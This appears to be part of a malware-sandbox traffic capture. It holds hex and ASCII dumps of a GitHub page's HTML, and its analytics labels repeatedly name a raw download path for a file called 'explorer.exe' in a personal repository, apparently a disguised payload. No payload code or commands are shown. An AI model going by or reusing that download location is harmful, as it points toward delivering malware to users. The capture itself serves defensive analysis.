                                                                                                                                  2022-10-17 20:07:12 UTC474INData Raw: 31 2d 2e 32 35 2d 2e 32 35 76 2d 39 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 64 3d 22 4d 32 32 2e 35 20 38 2e 37 35 61 2e 32 35 2e 32 35 20 30 20 30 30 2d 2e 32 35 2d 2e 32 35 68 2d 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 30 2d 31 2e 35 68 33 2e 35 63 2e 39 36 36 20 30 20 31 2e 37 35 2e 37 38 34 20 31 2e 37 35 20 31 2e 37 35 76 39 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 32 32 2e 32 35 20 32 30 48 32 31 76 31 2e 35 34 33 61 31 2e 34 35 37 20 31 2e 34 35 37 20 30 20 30 31 2d 32 2e 34 38 37 20 31 2e 30 33 4c 31 35 2e 39 33 39 20 32 30 48 31 30 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 31 39 20 31 38 2e 32 35 76 2d 31 2e 34 36 35 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 35 20 30 76 31 2e 34 36 35 63 30 20 2e 31 33 38 2e
                                                                                                                                  Data Ascii: 1-.25-.25v-9.5z"></path><path d="M22.5 8.75a.25.25 0 00-.25-.25h-3.5a.75.75 0 010-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0122.25 20H21v1.543a1.457 1.457 0 01-2.487 1.03L15.939 20H10.75A1.75 1.75 0 019 18.25v-1.465a.75.75 0 011.5 0v1.465c0 .138.
                                                                                                                                  2022-10-17 20:07:12 UTC476INData Raw: 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 69 74 68 75 62 2e 63 6f 6d 22 3e 0a 20 20 20 20 20 20 44 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77
                                                                                                                                  Data Ascii: &quot;label&quot;:&quot;ref_page:/testermanmag/myownre/raw/main/explorer.exe;ref_cta:Documentation;&quot;}" href="https://docs.github.com"> Documentation <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view
                                                                                                                                  2022-10-17 20:07:12 UTC477INData Raw: 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 30 2e 36 30 34 20 31 68 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 34 32 37 2e 31 37 37 4c 31 33 2e 30 33 20 34 2e 30 33 20 39 2e 32 38 20 37 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 37 35 2d 33 2e 37 35 2d 31 2e 35 34 33 2d 31 2e 35 34 33 41 2e 32 35 2e 32 35 20 30 20 30 31 31 30 2e 36 30 34 20 31 7a 4d 33 2e 37 35 20 32 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 32 20 33
                                                                                                                                  Data Ascii: xternal HeaderMenu-external-icon color-fg-subtle"> <path fill-rule="evenodd" d="M10.604 1h4.146a.25.25 0 01.25.25v4.146a.25.25 0 01-.427.177L13.03 4.03 9.28 7.78a.75.75 0 01-1.06-1.06l3.75-3.75-1.543-1.543A.25.25 0 0110.604 1zM3.75 2A1.75 1.75 0 002 3
                                                                                                                                  2022-10-17 20:07:12 UTC478INData Raw: 20 30 76 33 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2e 32 35 68 2d 38 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 32 35 2d 2e 32 35 76 2d 38 2e 35 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2d 2e 32 35 68 33 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 30 30 2d 31 2e 35 68 2d 33 2e 35 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 3c 2f 61 3e 3c 2f 6c 69 3e 0a 0a 20 20 20 20 20 20 20 20 3c 2f 75 6c 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 3c 2f 6c 69 3e 0a 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72 4d 65 6e 75 2d 69 74 65 6d 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 66 6c 65 78 2d 77 72 61 70 20 66 6c 65 78 2d 6a 75 73 74 69 66 79 2d 62 65 74 77 65 65 6e 20 66
                                                                                                                                  Data Ascii: 0v3.5a.25.25 0 01-.25.25h-8.5a.25.25 0 01-.25-.25v-8.5a.25.25 0 01.25-.25h3.5a.75.75 0 000-1.5h-3.5z"></path></svg></a></li> </ul> </div></li> <li class="HeaderMenu-item position-relative flex-wrap flex-justify-between f
                                                                                                                                  2022-10-17 20:07:12 UTC480INData Raw: 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 45 6e 74 65 72 70 72 69 73 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 45 6e 74 65 72 70 72 69 73 65 3b 26 71 75 6f 74 3b 7d 22
                                                                                                                                  Data Ascii: ta-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to Enterprise&quot;,&quot;label&quot;:&quot;ref_page:/testermanmag/myownre/raw/main/explorer.exe;ref_cta:Enterprise;&quot;}"
                                                                                                                                  2022-10-17 20:07:12 UTC481INData Raw: 2d 64 72 6f 70 64 6f 77 6e 2d 6c 69 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 53 6f 6c 75 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 49 2f 43 44 20 26 61 6d 70 3b 61 6d 70
                                                                                                                                  Data Ascii: -dropdown-link lh-condensed d-block no-underline position-relative py-2 Link--secondary" target="_blank" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Solutions&quot;,&quot;action&quot;:&quot;click to go to CI/CD &amp;amp
                                                                                                                                  2022-10-17 20:07:12 UTC482INData Raw: 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 44 65 76 4f 70 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 73 6f 75 72 63 65 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 64 65 76 6f 70 73 2f 22 3e 0a 20 20 20 20 20 20 44 65 76 4f 70 73 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f
                                                                                                                                  Data Ascii: uot;label&quot;:&quot;ref_page:/testermanmag/myownre/raw/main/explorer.exe;ref_cta:DevOps;&quot;}" href="https://resources.github.com/devops/"> DevOps <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-co
                                                                                                                                  2022-10-17 20:07:12 UTC484INData Raw: 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 6c 69 6e 6b 2d 65 78 74 65 72 6e 61 6c 20 48 65 61 64 65 72 4d 65 6e 75 2d 65 78 74 65 72 6e 61 6c 2d 69 63 6f 6e 20 63 6f 6c 6f 72 2d 66 67 2d 73 75 62 74 6c 65 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 30 2e 36 30 34 20 31 68 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2e 32 35 2e 32 35 76 34 2e 31 34 36 61 2e 32 35 2e 32 35 20 30 20 30 31 2d 2e 34 32 37 2e 31 37 37 4c 31 33 2e 30 33 20 34 2e 30 33 20 39 2e 32 38 20 37 2e 37 38 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 37 35 2d 33 2e 37 35 2d 31 2e 35 34 33 2d 31 2e 35 34 33 41 2e 32 35 2e 32 35 20 30 20 30 31 31 30 2e 36 30 34 20 31 7a 4d 33 2e 37 35
                                                                                                                                  Data Ascii: ticon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path fill-rule="evenodd" d="M10.604 1h4.146a.25.25 0 01.25.25v4.146a.25.25 0 01-.427.177L13.03 4.03 9.28 7.78a.75.75 0 01-1.06-1.06l3.75-3.75-1.543-1.543A.25.25 0 0110.604 1zM3.75
                                                                                                                                  2022-10-17 20:07:12 UTC485INData Raw: 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 52 65 73 6f 75 72 63 65 73 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 72 65 73 6f 75 72 63 65 73 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 22 3e 0a 20 20 20 20 20 20 52 65 73 6f 75 72 63 65 73 0a 0a 20 20 20 20 3c 73 76 67 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d
                                                                                                                                  Data Ascii: uot;label&quot;:&quot;ref_page:/testermanmag/myownre/raw/main/explorer.exe;ref_cta:Resources;&quot;}" href="https://resources.github.com/"> Resources <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-com
                                                                                                                                  2022-10-17 20:07:12 UTC486INData Raw: 63 74 69 63 6f 6e 2d 63 68 65 76 72 6f 6e 2d 64 6f 77 6e 20 48 65 61 64 65 72 4d 65 6e 75 2d 69 63 6f 6e 20 6d 6c 2d 31 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 32 2e 37 38 20 36 2e 32 32 61 2e 37 35 2e 37 35 20 30 20 30 31 30 20 31 2e 30 36 6c 2d 34 2e 32 35 20 34 2e 32 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 31 2e 30 36 20 30 4c 33 2e 32 32 20 37 2e 32 38 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 2d 31 2e 30 36 4c 38 20 39 2e 39 34 6c 33 2e 37 32 2d 33 2e 37 32 61 2e 37 35 2e 37 35 20 30 20 30 31 31 2e 30 36 20 30 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 48 65 61 64 65 72
                                                                                                                                  Data Ascii: cticon-chevron-down HeaderMenu-icon ml-1"> <path fill-rule="evenodd" d="M12.78 6.22a.75.75 0 010 1.06l-4.25 4.25a.75.75 0 01-1.06 0L3.22 7.28a.75.75 0 011.06-1.06L8 9.94l3.72-3.72a.75.75 0 011.06 0z"></path></svg> </button> <div class="Header
                                                                                                                                  2022-10-17 20:07:12 UTC488INData Raw: 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 54 68 65 20 52 65 61 64 4d 45 20 50 72 6f 6a 65 63 74 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 72 65 66 5f 70 61 67 65 3a 2f 74 65 73 74 65 72 6d 61 6e 6d 61 67 2f 6d 79 6f 77 6e 72 65 2f 72 61 77 2f 6d 61 69 6e 2f 65 78 70 6c 6f 72 65 72 2e 65 78 65 3b 72 65 66 5f 63 74 61 3a 54 68 65 20 52 65 61 64 4d 45 20 50 72 6f 6a 65 63 74 3b 26 71 75 6f 74 3b 7d 22 20 68 72 65 66 3d 22 2f 72 65 61 64 6d 65 22 3e 0a 20 20 20 20 20 20 0a 20 20 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 64 65 66 61 75 6c 74 20 68 34 22 3e 54 68 65 20 52 65 61 64
                                                                                                                                  Data Ascii: ction&quot;:&quot;click to go to The ReadME Project&quot;,&quot;label&quot;:&quot;ref_page:/testermanmag/myownre/raw/main/explorer.exe;ref_cta:The ReadME Project;&quot;}" href="/readme"> <div> <div class="color-fg-default h4">The Read
                                                                                                                                  2022-10-17 20:07:12 UTC489INData Raw: 6e 6b 20 6c 68 2d 63 6f 6e 64 65 6e 73 65 64 20 64 2d 62 6c 6f 63 6b 20 6e 6f 2d 75 6e 64 65 72 6c 69 6e 65 20 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 20 70 79 2d 32 20 4c 69 6e 6b 2d 2d 73 65 63 6f 6e 64 61 72 79 22 20 64 61 74 61 2d 61 6e 61 6c 79 74 69 63 73 2d 65 76 65 6e 74 3d 22 7b 26 71 75 6f 74 3b 63 61 74 65 67 6f 72 79 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 48 65 61 64 65 72 20 64 72 6f 70 64 6f 77 6e 20 28 6c 6f 67 67 65 64 20 6f 75 74 29 2c 20 4f 70 65 6e 20 53 6f 75 72 63 65 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 61 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 63 6c 69 63 6b 20 74 6f 20 67 6f 20 74 6f 20 43 6f 6c 6c 65 63 74 69 6f 6e 73 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6c 61 62 65 6c 26 71 75 6f 74 3b 3a 26 71 75 6f
                                                                                                                                  Data Ascii: nk lh-condensed d-block no-underline position-relative py-2 Link--secondary" data-analytics-event="{&quot;category&quot;:&quot;Header dropdown (logged out), Open Source&quot;,&quot;action&quot;:&quot;click to go to Collections&quot;,&quot;label&quot;:&quo
                                                                                                                                  2022-10-17 20:07:12 UTC490INData Raw: 63 68 20 73 69 74 65 2d 73 63 6f 70 65 64 2d 73 65 61 72 63 68 20 6a 73 2d 6a 75 6d 70 2d 74 6f 22 0a 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 6f 73 69 74 69 6f 6e 2d 72 65 6c 61 74 69 76 65 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 27 22 60 20 2d 2d 3e 3c 21 2d 2d 20 3c 2f 74 65 78 74 61 72 65 61 3e 3c 2f 78 6d 70 3e 20 2d 2d 3e 3c 2f 6f 70 74 69 6f 6e 3e 3c 2f 66 6f 72 6d 3e 3c 66 6f 72 6d 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d 66 6f 72 6d 22 20 72 6f 6c 65 3d 22 73 65 61 72 63 68 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 53 69 74 65 22 20 64 61 74 61 2d 73 63 6f 70 65 2d 74 79 70 65 3d 22 55 73 65 72 22 20 64 61 74 61 2d 73 63 6f 70 65 2d 69 64 3d 22 31 31 35 30 37 39 34 34 37 22 20 64 61 74 61 2d 73 63 6f 70 65 64 2d
                                                                                                                                  Data Ascii: ch site-scoped-search js-jump-to"> <div class="position-relative"> ... '"` -->... </textarea></xmp> --></option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="User" data-scope-id="115079447" data-scoped-
                                                                                                                                  2022-10-17 20:07:12 UTC492INData Raw: 66 66 22 0a 20 20 20 20 20 20 20 20 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 76 61 6c 75 65 3d 22 31 53 7a 71 64 63 4e 69 7a 38 74 76 36 65 66 39 42 78 5f 2d 61 48 73 66 77 65 33 61 48 70 5f 65 74 44 56 66 58 7a 48 53 53 4a 79 5f 41 48 4c 4d 65 51 52 4d 6b 61 37 59 4c 78 76 61 6a 33 6e 4c 69 6d 54 34 66 6e 4f 37 6d 64 64 62 4f 55 33 6d 69 54 6d 75 34 67 22 20 64 61 74 61 2d 63 73 72 66 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6a 73 2d 64 61 74 61 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 70 61 74 68 2d 63 73 72 66 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 6a 73 2d 73 69 74 65 2d 73 65 61 72 63 68 2d
                                                                                                                                  Data Ascii: ff" > <input type="hidden" value="1SzqdcNiz8tv6ef9Bx_-aHsfwe3aHp_etDVfXzHSSJy_AHLMeQRMka7YLxvaj3nLimT4fnO7mddbOU3miTmu4g" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" /> <input type="hidden" class="js-site-search-
                                                                                                                                  2022-10-17 20:07:12 UTC493INData Raw: 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 72 65 70 6f 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 32 20 32 2e 35 41 32 2e 35 20 32 2e 35 20 30 20 30 31 34 2e 35 20 30 68 38 2e 37 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2e 37 35 2e 37 35 76 31 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 30 31 2d 2e 37 35 2e 37 35 68 2d 32 2e 35 61 2e 37 35 2e 37 35 20 30 20 31 31 30 2d 31 2e 35 68 31 2e 37 35 76 2d 32 68 2d 38 61 31 20 31 20 30 20 30 30 2d 2e 37 31 34 20 31 2e 37 2e 37 35 2e
                                                                                                                                  Data Ascii: iew-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path fill-rule="evenodd" d="M2 2.5A2.5 2.5 0 014.5 0h8.75a.75.75 0 01.75.75v12.5a.75.75 0 01-.75.75h-2.5a.75.75 0 110-1.5h1.75v-2h-8a1 1 0 00-.714 1.7.75.
                                                                                                                                  2022-10-17 20:07:12 UTC494INData Raw: 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 73 65 61 72 63 68 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 31 2e 35 20 37 61 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 31 31 2d 38 2e 39 39 38 20 30 41 34 2e 34 39 39 20 34 2e 34 39 39 20 30 20 30 31 31 31 2e 35 20 37 7a 6d 2d 2e 38 32 20 34 2e 37 34 61 36 20 36 20 30 20 31 31 31 2e 30 36 2d 31 2e 30 36 6c 33 2e 30 34 20 33 2e 30 34 61 2e 37 35 2e 37 35 20 30 20 31 31 2d 31 2e 30 36 20 31 2e 30 36 6c 2d 33 2e 30 34 2d 33 2e 30 34 7a 22 3e 3c 2f 70 61 74 68 3e 0a 3c 2f 73 76 67 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 69 6d 67 20 63 6c 61 73 73 3d 22 61 76 61
                                                                                                                                  Data Ascii: jump-to-octicon-search d-none flex-shrink-0"> <path fill-rule="evenodd" d="M11.5 7a4.499 4.499 0 11-8.998 0A4.499 4.499 0 0111.5 7zm-.82 4.74a6 6 0 111.06-1.06l3.04 3.04a.75.75 0 11-1.06 1.06l-3.04-3.04z"></path></svg> </div> <img class="ava
                                                                                                                                  2022-10-17 20:07:12 UTC496INData Raw: 65 72 20 66 6c 65 78 2d 69 74 65 6d 73 2d 63 65 6e 74 65 72 20 66 35 20 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 20 70 2d 32 22 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 22 3e 4e 6f 20 73 75 67 67 65 73 74 65 64 20 6a 75 6d 70 20 74 6f 20 72 65 73 75 6c 74 73 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 6c 69 3e 0a 3c 2f 75 6c 3e 0a 0a 3c 75 6c 20 69 64 3d 22 6a 75 6d 70 2d 74 6f 2d 72 65 73 75 6c 74 73 22 20 72 6f 6c 65 3d 22 6c 69 73 74 62 6f 78 22 20 63 6c 61 73 73 3d 22 70 2d 30 20 6d 2d 30 20 6a 73 2d 6e 61 76 69 67 61 74 69 6f 6e 2d 63 6f 6e 74 61 69 6e 65 72 20 6a 75 6d 70 2d 74 6f 2d 73 75 67 67 65 73 74 69 6f 6e 73 2d 72 65 73 75 6c 74 73 2d 63 6f 6e 74 61
                                                                                                                                  Data Ascii: er flex-items-center f5 d-none js-jump-to-suggestion p-2"> <span class="color-fg-muted">No suggested jump to results</span> </li></ul><ul id="jump-to-results" role="listbox" class="p-0 m-0 js-navigation-container jump-to-suggestions-results-conta
                                                                                                                                  2022-10-17 20:07:12 UTC497INData Raw: 20 20 3c 73 76 67 20 74 69 74 6c 65 3d 22 50 72 6f 6a 65 63 74 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 50 72 6f 6a 65 63 74 22 20 72 6f 6c 65 3d 22 69 6d 67 22 20 68 65 69 67 68 74 3d 22 31 36 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 36 20 31 36 22 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 77 69 64 74 68 3d 22 31 36 22 20 64 61 74 61 2d 76 69 65 77 2d 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31
                                                                                                                                  Data Ascii: <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1
                                                                                                                                  2022-10-17 20:07:12 UTC498INData Raw: 74 61 72 67 65 74 22 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 6f 72 64 65 72 20 72 6f 75 6e 64 65 64 2d 32 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 20 63 6f 6c 6f 72 2d 62 67 2d 73 75 62 74 6c 65 20 70 78 2d 31 20 63 6f 6c 6f 72 2d 66 67 2d 6d 75 74 65 64 20 6d 6c 2d 31 20 66 36 20 64 2d 6e 6f 6e 65 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 74 68 69 73 20 75 73 65 72 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 20 74 68 69 73 20 75 73 65
                                                                                                                                  Data Ascii: target"> </div> <div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this use
